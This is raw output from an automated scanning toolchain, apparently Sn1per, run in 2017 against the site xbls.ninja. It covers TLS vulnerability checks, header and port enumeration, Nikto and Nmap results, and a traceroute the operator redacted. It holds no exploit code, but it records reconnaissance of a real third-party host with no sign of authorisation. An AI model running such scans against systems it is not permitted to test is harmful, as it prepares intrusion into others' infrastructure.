1169. *.todaysfamilymagazine.com *.txtbattle.ru *.usadba-nsk.ru *.xbls.ninja
1170. *.xblsyndicate.ninja anhaniuso.top bit.cm charlottestowels.xyz
1171. daypeada.top dedinow.com digitalgiftcodes.com digitalpaymentgateway.com
1172. giofalco.com ideal-2vh3g.ga landsdownefootandankle.com learnlsp.com
1173. lsp.academy michaelfearne.com nanovds.com pro-palo.ru scoresbuch.cf
1174. summitvillegoodshopping.ga swell-fstf8.ml todaysfamilymagazine.com
1175. txtbattle.ru usadba-nsk.ru xbls.ninja xblsyndicate.ninja
1176. Issuer COMODO ECC Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
1177. Trust (hostname) Ok via SAN (SNI mandatory)
1178. Chain of trust Ok
1179. EV cert (experimental) no
1180. Certificate Expiration 183 >= 60 days (2017-07-06 00:00 --> 2018-01-12 23:59 +0000)
1181. # of certificates provided 3
1182. Certificate Revocation List http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
1183. OCSP URI http://ocsp.comodoca4.com
1184. OCSP stapling offered
1185. OCSP must staple no
1186. DNS CAA RR (experimental) --
1187.  
1188.  
1189. Testing HTTP header response @ "/"
1190.  
1191. HTTP Status Code 200 OK
1192. HTTP clock skew -7166 sec from localtime
1193. Strict Transport Security 180 days=15552000 s, just this domain
1194. Public Key Pinning --
1195. Server banner cloudflare-nginx
1196. Application banner --
1197. Cookie(s) 1 issued: NOT secure, 1/1 HttpOnly
1198. Security headers X-Frame-Options SAMEORIGIN
1199. X-XSS-Protection 1; mode=block
1200. X-Content-Type-Options nosniff
1201. Reverse Proxy banner --
1202.  
1203.  
1204. Testing vulnerabilities
1205.  
1206. Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
1207. CCS (CVE-2014-0224) not vulnerable (OK)
1208. Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), no session tickets
1209. Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
1210. Secure Client-Initiated Renegotiation not vulnerable (OK)
1211. CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
1212. BREACH (CVE-2013-3587) potentially NOT ok, uses gzip HTTP compression. - only supplied "/" tested
1213. Can be ignored for static pages or if no secrets in the page
1214. POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
1215. TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
1216. SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
1217. FREAK (CVE-2015-0204) not vulnerable (OK)
1218. DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this port (OK)
1219. no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
1220. LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
1221. BEAST (CVE-2011-3389) TLS1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
1222. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
1223. LUCKY13 (CVE-2013-0169) VULNERABLE, uses cipher block chaining (CBC) ciphers
1224. RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
1225.  
1226.  
1227. Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength
1228.  
1229. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
1230. -----------------------------------------------------------------------------------------------------------------------------
1231. xcc14 ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH 256 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
1232. xc02c ECDHE-ECDSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
1233. xc024 ECDHE-ECDSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
1234. xc00a ECDHE-ECDSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
1235. xcca9 ECDHE-ECDSA-CHACHA20-POLY1305 ECDH 253 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
1236. xc02b ECDHE-ECDSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
1237. xc023 ECDHE-ECDSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
1238. xc009 ECDHE-ECDSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
1239.  
1240.  
1241. Running client simulations via sockets
1242.  
1243. Android 2.3.7 No connection
1244. Android 4.1.1 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1245. Android 4.2.2 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1246. Android 4.4.2 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1247. Android 5.0.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
1248. Android 6.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
1249. Android 7.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, 253 bit ECDH (X25519)
1250. Baidu Jan 2015 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1251. Chrome 51 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
1252. Edge 13 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1253. Edge 13 Win Phone 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1254. Firefox 49 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1255. Firefox 49 XP SP3 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1256. IE 11 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1257. IE 11 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1258. IE 11 Win 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1259. IE 11 Win Phone 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1260. IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1261. IE 6 XP No connection
1262. IE 7 Vista TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1263. IE 8 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1264. IE 8 XP No connection
1265. Java 6u45 No connection
1266. Java 7u25 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1267. Java 8b132 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1268. OpenSSL 1.0.1l TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1269. OpenSSL 1.0.2e TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1270. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1271. Safari 6.0.4 OS X 10.8.4 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1272. Safari 7 OS X 10.9 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1273. Safari 8 OS X 10.10 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1274. Safari 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1275. Safari 9 OS X 10.11 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1276. Safari 10 OS X 10.12 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1277. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1278. Tor 17.0.9 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1279.  
1280. Done 2017-07-13 08:16:22 [ 97s] -->> 104.27.135.184:443 (xbls.ninja) <<--
1281.  
1282. --------------------------------------------------------------------
1283. Done testing now all IP addresses (on port 443): 104.27.134.184 104.27.135.184
1284.  
1285.  
1286. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
1287. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
1288. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
1289. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
1290. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
1291. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
1292. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
1293. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
1294. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
1295. ░ ░
1296. + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
1297. + -- --=[Checking for DROWN (SSLv2): 104.27.134.184:443
1298. + -- --=[Checking for HeartBleed: 104.27.134.184:443
1299. + -- --=[Checking for OpenSSL CCS: 104.27.134.184:443
1300. + -- --=[Checking for Poodle (SSLv3): 104.27.134.184:443
1301. + -- --=[Checking for WinShock (MS14-066): 104.27.134.184:443
1302. Testing if OpenSSL supports the ciphers we are checking for: YES
1303.  
1304. Testing 104.27.134.184:443 for availability of SSL ciphers added in MS14-066...
1305. Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
1306. Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
1307. Testing cipher AES256-GCM-SHA384: UNSUPPORTED
1308. Testing cipher AES128-GCM-SHA256: UNSUPPORTED
1309. Testing if IIS is running on port 443: NO
1310. Checking if target system is running Windows Server 2012 or later...
1311. Testing cipher ECDHE-RSA-AES256-SHA384: UNSUPPORTED
1312. Testing cipher ECDHE-RSA-AES256-SHA: UNSUPPORTED
1313. 104.27.134.184:443 is patched: NO
1314. + -- --=[Scan Complete!
1315. + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
1316. + -- --=[Checking if X-Content options are enabled on xbls.ninja...
1317. x-content-type-options: nosniff
1318.  
1319. + -- --=[Checking if X-Frame options are enabled on xbls.ninja...
1320. x-frame-options: SAMEORIGIN
1321.  
1322. + -- --=[Checking if X-XSS-Protection header is enabled on xbls.ninja...
1323. x-xss-protection: 1; mode=block
1324.  
1325. + -- --=[Checking HTTP methods on xbls.ninja...
1326.  
1327. + -- --=[Checking if TRACE method is enabled on xbls.ninja...
1328.  
1329. + -- --=[Checking for META tags on xbls.ninja...
1330. <meta name="twitter:title" content="NiNJA: the ORIGINAL XBLS – #1 JTAG/RGH XBL online service!"/>
1331. <meta name="twitter:site" content="@XBLS_NiNJA"/>
1332. <meta name="twitter:image" content="https://xbls.ninja/aim/exbls_ed9?on_url=https://xbls.ninja/images/content/online.png&#038;off_url=https://xbls.ninja/images/content/offline.png"/>
1333. <meta name="twitter:creator" content="@XBLS_NiNJA"/>
1334. <meta property="DC.date.issued" content="2015-06-08T06:11:40-06:00"/>
1335. <meta name="generator" content="WordPress 4.8"/>
1336. <meta name="generator" content="WooCommerce 2.6.14"/>
1337. <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
1338. <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://xbls.ninja/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><meta name="generator" content="Powered by Slider Revolution 5.2.6 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface."/>
1339. <meta name="msapplication-TileImage" content="https://xbls.ninja/wp-content/uploads/2015/06/favicon.png"/>
1340.  
1341. + -- --=[Checking for open proxy on xbls.ninja...
1342.  
1343. + -- --=[Enumerating software on xbls.ninja...
1344. server: cloudflare-nginx
1345.  
1346. + -- --=[Checking if Strict-Transport-Security is enabled on xbls.ninja...
1347. strict-transport-security: max-age=15552000
1348.  
1349. + -- --=[Checking for Flash cross-domain policy on xbls.ninja...
1350. </script>
1351. <script type='text/javascript' src='https://xbls.ninja/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/sb-woocommerce-email-verification/assets/js/sb.js,wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js,wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js,wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js,wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js,wp-content/themes/patti/js/jquery.lazyload.js,wp-content/themes/patti/js/hoverIntent.js,wp-content/themes/patti/js/scripts-bottom.js,wp-content/themes/patti/js/jquery.isotope.min.js,wp-content/themes/patti/js/custom/custom-isotope-portfolio.js,wp-content/themes/patti/js/custom/custom-isotope-blog.js,wp-content/themes/patti/js/custom/custom-nav.js,wp-content/themes/patti/js/custom/custom.js,wp-includes/js/wp-embed.min.js&#038;ver=1497937331'></script>
1352. <script> </script>
1353. <!--[if lt IE 9]>
1354. <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
1355. <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
1356. <![endif]-->
1357. </body>
1358. </html>
1359.  
1360. + -- --=[Checking for Silverlight cross-domain policy on xbls.ninja...
1361. </script>
1362. <script type='text/javascript' src='https://xbls.ninja/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/sb-woocommerce-email-verification/assets/js/sb.js,wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js,wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js,wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js,wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js,wp-content/themes/patti/js/jquery.lazyload.js,wp-content/themes/patti/js/hoverIntent.js,wp-content/themes/patti/js/scripts-bottom.js,wp-content/themes/patti/js/jquery.isotope.min.js,wp-content/themes/patti/js/custom/custom-isotope-portfolio.js,wp-content/themes/patti/js/custom/custom-isotope-blog.js,wp-content/themes/patti/js/custom/custom-nav.js,wp-content/themes/patti/js/custom/custom.js,wp-includes/js/wp-embed.min.js&#038;ver=1497937331'></script>
1363. <script> </script>
1364. <!--[if lt IE 9]>
1365. <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
1366. <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
1367. <![endif]-->
1368. </body>
1369. </html>
1370.  
1371. + -- --=[Checking for HTML5 cross-origin resource sharing on xbls.ninja...
1372.  
1373. + -- --=[Retrieving robots.txt on xbls.ninja...
1374. User-agent: *
1375. Allow: /
1376.  
1377. + -- --=[Retrieving sitemap.xml on xbls.ninja...
1378.  
1379. + -- --=[Checking cookie attributes on xbls.ninja...
1380. set-cookie: __cfduid=d84735e5459b26e0d084d9ad4ffa7d0911499926633; expires=Fri, 13-Jul-18 06:17:13 GMT; path=/; domain=.xbls.ninja; HttpOnly
1381.  
1382. + -- --=[Checking for ASP.NET Detailed Errors on xbls.ninja...
1383. <body class="error404 wpb-js-composer js-comp-ver-5.1.1 vc_responsive">
1384. <h1 class="aligncenter">Error 404 - Not Found</h1>
1385. <body class="error404 wpb-js-composer js-comp-ver-5.1.1 vc_responsive">
1386. <h1 class="aligncenter">Error 404 - Not Found</h1>
1387.  
1388.  
1389. + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
1390. - Nikto v2.1.6
1391. ---------------------------------------------------------------------------
1392. + Target IP: 104.27.134.184
1393. + Target Hostname: xbls.ninja
1394. + Target Port: 443
1395. ---------------------------------------------------------------------------
1396. + SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni87911.cloudflaressl.com
1397. Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305
1398. Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
1399. + Start Time: 2017-07-13 08:16:42 (GMT0)
1400. ---------------------------------------------------------------------------
1401. + Server: cloudflare-nginx
1402. + Cookie __cfduid created without the secure flag
1403. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
1404. + Uncommon header 'cf-ray' found, with contents: 37da1e40fb36763c-ARN
1405. + All CGI directories 'found', use '-C none' to test none
1406. + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
1407. + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: SSL negotiation failed: error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure at /var/lib/nikto/plugins/LW2.pm line 5157.
1408. at /var/lib/nikto/plugins/LW2.pm line 5157.
1409. ; at /var/lib/nikto/plugins/LW2.pm line 5157.
1410. + Scan terminated: 20 error(s) and 4 item(s) reported on remote host
1411. + End Time: 2017-07-13 08:17:08 (GMT0) (26 seconds)
1412. ---------------------------------------------------------------------------
1413. + 1 host(s) tested
1414. + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
1415. QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once.
1416. content-type missing in HTTP POST, defaulting to application/x-www-form-urlencoded. Use QNetworkRequest::setHeader() to fix this problem.
1417. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/xbls.ninja-port443.jpg
1418. + -- --=[Port 445 closed... skipping.
1419. + -- --=[Port 512 closed... skipping.
1420. + -- --=[Port 513 closed... skipping.
1421. + -- --=[Port 514 closed... skipping.
1422. + -- --=[Port 623 closed... skipping.
1423. + -- --=[Port 624 closed... skipping.
1424. + -- --=[Port 1099 closed... skipping.
1425. + -- --=[Port 1433 closed... skipping.
1426. + -- --=[Port 2049 closed... skipping.
1427. + -- --=[Port 2121 closed... skipping.
1428. + -- --=[Port 3306 closed... skipping.
1429. + -- --=[Port 3310 closed... skipping.
1430. + -- --=[Port 3128 closed... skipping.
1431. + -- --=[Port 3389 closed... skipping.
1432. + -- --=[Port 3632 closed... skipping.
1433. + -- --=[Port 4443 opened... running tests...
1434.  
1435. ^ ^
1436. _ __ _ ____ _ __ _ _ ____
1437. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1438. | V V // o // _/ | V V // 0 // 0 // _/
1439. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1440. <
1441. ...'
1442.  
1443. WAFW00F - Web Application Firewall Detection Tool
1444.  
1445. By Sandro Gauci && Wendel G. Henrique
1446.  
1447. Checking http://xbls.ninja:4443
1448. ERROR:root:Site http://xbls.ninja:4443 appears to be down
1449.  
1450. /usr/share/whatweb/lib/target.rb:189: warning: constant ::TimeoutError is deprecated
1451. http://xbls.ninja:4443 ERROR: Timed out execution expired
1452.  
1453.  
1454. __ ______ _____
1455. \ \/ / ___|_ _|
1456. \ /\___ \ | |
1457. / \ ___) || |
1458. /_/\_|____/ |_|
1459.  
1460. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
1461. + -- --=[Target: xbls.ninja:4443
1462. + -- --=[Port is closed!
1463. Version: 1.11.10-static
1464. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1465.  
1466. ERROR: Could not open a connection to host xbls.ninja on port 4443.
1467.  
1468.  
1469.  
1470. AVAILABLE PLUGINS
1471. -----------------
1472.  
1473. PluginCertInfo
1474. PluginSessionRenegotiation
1475. PluginHSTS
1476. PluginChromeSha1Deprecation
1477. PluginOpenSSLCipherSuites
1478. PluginCompression
1479. PluginSessionResumption
1480. PluginHeartbleed
1481.  
1482.  
1483.  
1484. CHECKING HOST(S) AVAILABILITY
1485. -----------------------------
1486.  
1487. xbls.ninja:4443 => WARNING: Could not connect (timeout); discarding corresponding tasks.
1488.  
1489.  
1490.  
1491. SCAN COMPLETED IN 10.05 S
1492. -------------------------
1493. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
1494. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
1495. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
1496. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
1497. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
1498. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
1499. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
1500. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
1501. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
1502. ░ ░
1503. + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
1504. + -- --=[Scan Complete!
1505. - Nikto v2.1.6
1506. ---------------------------------------------------------------------------
1507. + No web server found on xbls.ninja:4443
1508. ---------------------------------------------------------------------------
1509. + 0 host(s) tested
1510.  
1511. Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-13 08:25 UTC
1512. Nmap scan report for xbls.ninja (104.27.135.184)
1513. Host is up (0.012s latency).
1514. Other addresses for xbls.ninja (not scanned): 104.27.134.184
1515.  
1516. PORT STATE SERVICE VERSION
1517. 4443/tcp filtered pharos
1518. Too many fingerprints match this host to give specific OS details
1519. Network Distance: 7 hops
1520.  
1521. TRACEROUTE (using proto 1/icmp)
1522. HOP RTT ADDRESS
1523. 1 REMOVED FOR MY SECURITY
1524. 2 REMOVED FOR MY SECURITY
1525. 3 REMOVED FOR MY SECURITY
1526. 4 REMOVED FOR MY SECURITY
1527. 5 REMOVED FOR MY SECURITY
1528. 6 REMOVED FOR MY SECURITY
1529. 7 REMOVED FOR MY SECURITY
1530.  
1531. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1532. Nmap done: 1 IP address (1 host up) scanned in 3.91 seconds
1533. + -- --=[Port 5432 closed... skipping.
1534. + -- --=[Port 5800 closed... skipping.
1535. + -- --=[Port 5900 closed... skipping.
1536. + -- --=[Port 5984 closed... skipping.
1537. + -- --=[Port 6000 closed... skipping.
1538. + -- --=[Port 6667 closed... skipping.
1539. + -- --=[Port 8000 closed... skipping.
1540. + -- --=[Port 8100 closed... skipping.
1541. + -- --=[Port 8080 opened... running tests...
1542.  
1543. ^ ^
1544. _ __ _ ____ _ __ _ _ ____
1545. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1546. | V V // o // _/ | V V // 0 // 0 // _/
1547. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1548. <
1549. ...'
1550.  
1551. WAFW00F - Web Application Firewall Detection Tool
1552.  
1553. By Sandro Gauci && Wendel G. Henrique
1554.  
1555. Checking http://xbls.ninja:8080
1556. ERROR:root:Site http://xbls.ninja:8080 appears to be down
1557.  
1558. /usr/share/whatweb/lib/target.rb:189: warning: constant ::TimeoutError is deprecated
1559. http://xbls.ninja:8080 ERROR: Timed out Net::ReadTimeout
1560.  
1561.  
1562. __ ______ _____
1563. \ \/ / ___|_ _|
1564. \ /\___ \ | |
1565. / \ ___) || |
1566. /_/\_|____/ |_|
1567.  
1568. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
1569. + -- --=[Target: xbls.ninja:8080
1570. + -- --=[Site not vulnerable to Cross-Site Tracing!
1571. + -- --=[Site not vulnerable to Host Header Injection!
1572. Traceback (most recent call last):
1573. File "/usr/bin/xsstracer", line 141, in <module>
1574. main(sys.argv)
1575. File "/usr/bin/xsstracer", line 120, in main
1576. data2 = s2.recv(1024)
1577. socket.timeout: timed out
1578. Version: 1.11.10-static
1579. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1580.  
1581. Testing SSL server xbls.ninja on port 8080 using SNI name xbls.ninja
1582.  
1583. TLS Fallback SCSV:
1584. Server does not support TLS Fallback SCSV
1585.  
1586. TLS renegotiation:
1587. Session renegotiation not supported
1588.  
1589. TLS Compression:
1590. Compression disabled
1591.  
1592. Heartbleed:
1593. TLS 1.2 not vulnerable to heartbleed
1594. TLS 1.1 not vulnerable to heartbleed
1595. TLS 1.0 not vulnerable to heartbleed
1596.  
1597. Supported Server Cipher(s):
1598. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
1599. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
1600. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
1601. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
1602. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
1603. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
1604. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
1605. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
1606. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
1607. ░ ░
1608. + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
1609. + -- --=[Checking for DROWN (SSLv2): 104.27.134.184:8080
1610. + -- --=[Checking for HeartBleed: 104.27.134.184:8080
1611. + -- --=[Checking for OpenSSL CCS: 104.27.134.184:8080
1612. + -- --=[Checking for Poodle (SSLv3): 104.27.134.184:8080
1613. + -- --=[Checking for WinShock (MS14-066): 104.27.134.184:8080
1614. Testing if OpenSSL supports the ciphers we are checking for: YES
1615.  
1616. Testing 104.27.134.184:8080 for availability of SSL ciphers added in MS14-066...
1617. Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
1618. Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
1619. Testing cipher AES256-GCM-SHA384: UNSUPPORTED
1620. Testing cipher AES128-GCM-SHA256: UNSUPPORTED
1621. Checking if target system is running Windows Server 2012 or later...
1622. Testing cipher ECDHE-RSA-AES256-SHA384: UNSUPPORTED
1623. Testing cipher ECDHE-RSA-AES256-SHA: UNSUPPORTED
1624. 104.27.134.184:8080 is patched: NO
1625. + -- --=[Scan Complete!
1626. - Nikto v2.1.6
1627. ---------------------------------------------------------------------------
1628. + Target IP: 104.27.135.184
1629. + Target Hostname: xbls.ninja
1630. + Target Port: 8080
1631. + Start Time: 2017-07-13 08:26:31 (GMT0)
1632. ---------------------------------------------------------------------------
1633. + Server: cloudflare-nginx
1634. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
1635. + Uncommon header 'cf-ray' found, with contents: 37da2ca1c4d1871b-ARN
1636. + All CGI directories 'found', use '-C none' to test none
